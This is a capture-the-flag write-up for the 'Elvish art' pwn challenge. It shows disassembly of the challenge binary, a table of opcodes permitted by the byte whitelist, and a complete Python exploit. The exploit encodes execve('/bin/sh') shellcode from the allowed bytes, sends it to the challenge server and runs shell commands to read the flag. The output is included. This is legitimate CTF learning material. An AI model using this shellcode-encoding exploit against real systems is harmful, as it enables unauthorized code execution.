CTFtime.org

Day 22: Elvish art

by IoN / IoN

Rating:

# Elvish art - Pwn (300)

The North Pole R&D Division has spent decades bringing machine language closer to elvish language. At last, they succeeded... in a way

Service: nc 3.81.191.176 1222

Download: [Mr8wiOo6nmHNJRHrRgoWSN9P2KKkfcLS-elvishart.tar.xz](https://s3.amazonaws.com/advent2018/Mr8wiOo6nmHNJRHrRgoWSN9P2KKkfcLS-elvishart.tar.xz)
Mirror: [Mr8wiOo6nmHNJRHrRgoWSN9P2KKkfcLS-elvishart.tar.xz](./static/Mr8wiOo6nmHNJRHrRgoWSN9P2KKkfcLS-elvishart.tar.xz)

## Disassembly

This problem is a fairly straightforward pwnable. Opening up the binary and disassembling I came up with the following (rough) pseudocode:

```
shellcode = mmap(length=0x100000, prot=RWX)
while True:
ch = readbyte()
if ch == 0xff:
jmp shellcode
elif strchr(ascii_art,ch) != NULL or ch == 0
append ch to shellcode
else
print("invalid char")
exit
```

So basically the problem setup is to construct shellcode from a restricted character set and send it to the server.

## Setup for Shellcode

First, I started by looking at the available byte values and determining what sort of instructions were available. Below is each byte and what an x86 instruction starting with that byte looks like:

```
db 0x00 add (various) [e??+??], [abc][lh]
db 0x0a or (various) [abc][lh], [e??+??]
db 0x20 and (various) [e??+??], [abc][lh]
db 0x27 daa? Decimal Adjust AL after Subtraction
db 0x28 sub (various) [e??+??], [abc][lh]
db 0x29 sub (various) [e??+??], e??
db 0x2a sub (various) ah, al, bh, ch, cl, bl
db 0x2d AABBCCDD sub eax,0xDDCCBBAA
db 0x2f das? Decimal Adjust AL after Subtraction;
db 0x3a cmp (various) ah, al, bh, ch, cl, bl
db 0x3c XX cmp al, XX
db 0x3d AABBCCDD cmp eax,0xDDCCBBAA
db 0x3e ds?
db 0x40 inc eax
db 0x4b dec ebx
db 0x4f dec edi
db 0x56 push esi
db 0x5b pop ebx
db 0x5c pop esp
db 0x5d pop ebp
db 0x5e pop esi
db 0x5f pop edi
db 0x60 pushad
db 0x6f outsd? -- outputs edx to serial port
db 0x7b XX jpo (parity odd)
db 0x7c XX jl
db 0x7d XX jge
db 0x7e XX jg
```

As a sanity check I tried making shellcode with just these bytes and `msfvenom`, but as I suspected the problem was not that easy and couldn't generate shellcode for me automatically.

```
$ msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x2b\x2c\x2e\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3b\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4c\x4d\x4e\x50\x51\x52\x53\x54\x55\x57\x58\x59\x5a\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with An encoding exception occurred.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=25, char=0x08)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/countdown
Error: No valid set instruction could be created!
```

As a last piece of information gathering, I intentionally crashed the program around the 'jmp eax (shellcode)' instruction to see what the initial register values were when we jumped to the shellcode.

```
$ echo -e '\x00\x00\x00\xff' | LD_PRELOAD=/lib32/libSegFault.so ./chal
Looks like valid ASCII art to me!!
*** Segmentation fault
Register dump:

EAX: f7be3000 EBX: 565fffbc ECX: 00000000 EDX: f7eb989c
ESI: f7eb8001 EDI: 00000000 EBP: ff936dd8 ESP: ff936dab

EIP: f7ce3004 EFLAGS: 00010282

CS: 0023 DS: 002b ES: 002b FS: 0000 GS: 0063 SS: 002b

Trap: 0000000e Error: 00000006 OldMask: 00000000
ESP/signal: ff936dab CR2: 00000000

FPUCW: ffff037f FPUSW: ffff0000 TAG: ffffffff
IPOFF: 00000000 CSSEL: 0023 DATAOFF: 0000ffff DATASEL: 002b

ST(0) 0000 0000000000000000 ST(1) 0000 0000000000000000
ST(2) 0000 0000000000000000 ST(3) 0000 0000000000000000
ST(4) 0000 0000000000000000 ST(5) 0000 0000000000000000
ST(6) 0000 0000000000000000 ST(7) 0000 0000000000000000

Backtrace:

Memory map:

565fe000-565ff000 r-xp 00000000 08:01 1056502 /home/john/elvishart/chal
565ff000-56600000 r--p 00000000 08:01 1056502 /home/john/elvishart/chal
56600000-56601000 rw-p 00001000 08:01 1056502 /home/john/elvishart/chal
57f49000-57f6b000 rw-p 00000000 00:00 0 [heap]
f7be3000-f7ce3000 rwxp 00000000 00:00 0
f7ce3000-f7eb5000 r-xp 00000000 08:01 808422 /lib32/libc-2.27.so
f7eb5000-f7eb6000 ---p 001d2000 08:01 808422 /lib32/libc-2.27.so
f7eb6000-f7eb8000 r--p 001d2000 08:01 808422 /lib32/libc-2.27.so
f7eb8000-f7eb9000 rw-p 001d4000 08:01 808422 /lib32/libc-2.27.so
f7eb9000-f7ebc000 rw-p 00000000 00:00 0
f7ed3000-f7ed6000 r-xp 00000000 08:01 808420 /lib32/libSegFault.so
f7ed6000-f7ed7000 r--p 00002000 08:01 808420 /lib32/libSegFault.so
f7ed7000-f7ed8000 rw-p 00003000 08:01 808420 /lib32/libSegFault.so
f7ed8000-f7eda000 rw-p 00000000 00:00 0
f7eda000-f7edd000 r--p 00000000 00:00 0 [vvar]
f7edd000-f7edf000 r-xp 00000000 00:00 0 [vdso]
f7edf000-f7f05000 r-xp 00000000 08:01 808418 /lib32/ld-2.27.so
f7f05000-f7f06000 r--p 00025000 08:01 808418 /lib32/ld-2.27.so
f7f06000-f7f07000 rw-p 00026000 08:01 808418 /lib32/ld-2.27.so
ff918000-ff939000 rw-p 00000000 00:00 0 [stack]
Segmentation fault (core dumped)
```

This showed that `EIP == EAX ==` pointer to shellcode, and `ECX == EDI == 0` - both good starting points.

## Creating Shellcode

With all of the above ready to go, I needed a way to construct arbitrary shellcode instructions (of any byte values) and then execute them. Luckily we have a lot of space for our shellcode to work with (0x100000 bytes). At this point, I took a look at what instructions were available and came up with the following strategy:

* set `eax` to a value farther along in the shellcode
* set some other register to a byte of new shellcode and write it to `*eax`
* increment `eax`
* fill the remaining space (between all of this logic and the new shellcode) with innocuous instructions - there's no `0x90` for a NOP-sled, but something similar should work

Ok, step 1 - set `eax` to the end of the shellcode. We have an arbitrary `sub eax, 0xDDCCBBAA` but need the `AA`, `BB`, `CC`, `DD` byte values to be from our whitelisted set of bytes. Four values which work are `0x4b3e4040`, `0x403d4040`, `0x3a3a4040`, and `0x3a3a4040` which sets `eax := eax + 0xfff00`. Perfect.

Step 2 - create shellcode in a designated register. Well, we know that `edi` is zero, and we have a `pushad` and `pop ebx` avaiable so use all three in concert to set `ebx` to zero. From there, we can call `dec ebx` to subtract from `ebx` one at a time until we have a byte of shellcode. And finally, when we have the right byte lined up in the low byte of `ebx` we can call `add [eax+0x0],bl` to move that low byte into `eax`. Finally increment `eax` to move into the next byte of shellcode.

Last step - get some sort of NOP-sled or meaningless instruction sled to our shellcode. I chose `inc eax` followed by some `0x00` bytes where the target shellcode would go (offset `0xfff00`).

Using some `execl(/bin/sh)` shellcode generated from `msfvenom` I constructed shellcode, converted it to bytes with [nasm](https://nasm.us/doc/nasmdoc2.html), and then sent it to the server followed by some shell commands to dump the flag. The final python code for all of this is given below:

```python
#!/usr/bin/env python3

import sys
import random
import subprocess
import socket
import time

def random_shellcode():

whitelist_bytes = b'\x00\x0a\x20\x27\x28\x29\x2a\x2d\x2f\x3a\x3c\x3d\x3e\x40\x4b\x4f\x56\x5b\x5c\x5d\x5e\x5f\x60\x6f\x7b\x7c\x7d\x7e'
whitelist_arr = list(whitelist_bytes)

arr = [random.choice(whitelist_arr) for i in range(1000000)]

with open('shellcode_random','wb') as f:
f.write(bytes(arr))
f.close()
subprocess.Popen(['ndisasm','-b','32','shellcode_random']).wait()

def real_shellcode():

# allocated space is 0x100000

# eax == shellcode, want eax + 0x100000-40ish
print('BITS 32')
print('sub eax,0x4b3e4040')
print('sub eax,0x403d4040')
print('sub eax,0x3a3a4040')
print('sub eax,0x3a3a4040')
# eax = eax + 0xfff00

print('pushad')
print('pop ebx') # edi
# ebx == 0

buf = b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += b"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08"
buf += b"\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53"
buf += b"\x89\xe1\xcd\x80"

ebx = 0
for ch in buf:
n = (ebx-ch) % 256
for i in range(n):
print('dec ebx')
ebx = ebx - n
#print('add [eax+0x0],bl')
print('db 0x00,0x5C,0x20,0x00')
print('inc eax')

for i in range(0xfff00-0x0000186D):
print('inc eax')

for i in range(0x40):
print('db 0x00')
print('db 0xff')

#print("db 'id', 0x0a")

def connect_to_server():
s = socket.socket()
s.settimeout(10)
s.connect(('3.81.191.176',1222))
with open('gen_shell','rb') as f:
data = f.read(1024)
while len(data) > 0:
s.send(data)
data = f.read(1024)
f.close()
print(s.recv(50))

time.sleep(1)
s.send(b'id\n')
print(s.recv(10240).decode('ascii'))
s.send(b'cat flag\n')
print(s.recv(10240).decode('ascii'))
s.send(b'ls -al\n')
print(s.recv(10240).decode('ascii'))
s.send(b'ps aux\n')
print(s.recv(10240).decode('ascii'))

if __name__ == '__main__':

#random_shellcode()
#real_shellcode() # ./shellcode.py > gen_shell.asm && nasm gen_shell.asm

connect_to_server()

```

All of this gives us the flag:

```
$ ./shellcode.py
b'Looks like valid ASCII art to me!!\n'
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

AOTW{Every artist was 1st an amateur}

total 20
drwxr-xr-x 1 root root 4096 Dec 21 21:54 .
drwxr-xr-x 1 root root 4096 Dec 22 12:00 ..
-rwxr-xr-x 1 root root 5464 Dec 21 11:49 chal
-rw-r--r-- 1 1000 1000 38 Dec 21 21:34 flag

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4628 852 ? Ss Dec22 0:00 /bin/sh -c /usr/sbin/inetd -d
root 6 0.0 0.0 31872 2948 ? S Dec22 0:00 /usr/sbin/inetd -d
nobody 5663 0.0 0.0 8804 864 ? Ss 22:34 0:00 /usr/bin/timeout 60 /opt/chal
nobody 5664 3.0 0.0 4628 772 ? S 22:34 0:00 /bin/sh -c /bin/sh
nobody 5665 0.0 0.0 4628 828 ? S 22:34 0:00 /bin/sh
nobody 5669 0.0 0.0 34400 2796 ? R 22:34 0:00 ps aux

```

Original writeup (https://github.com/nononovak/otwadvent2018-ctfwriteup/blob/master/day22.md).

Comments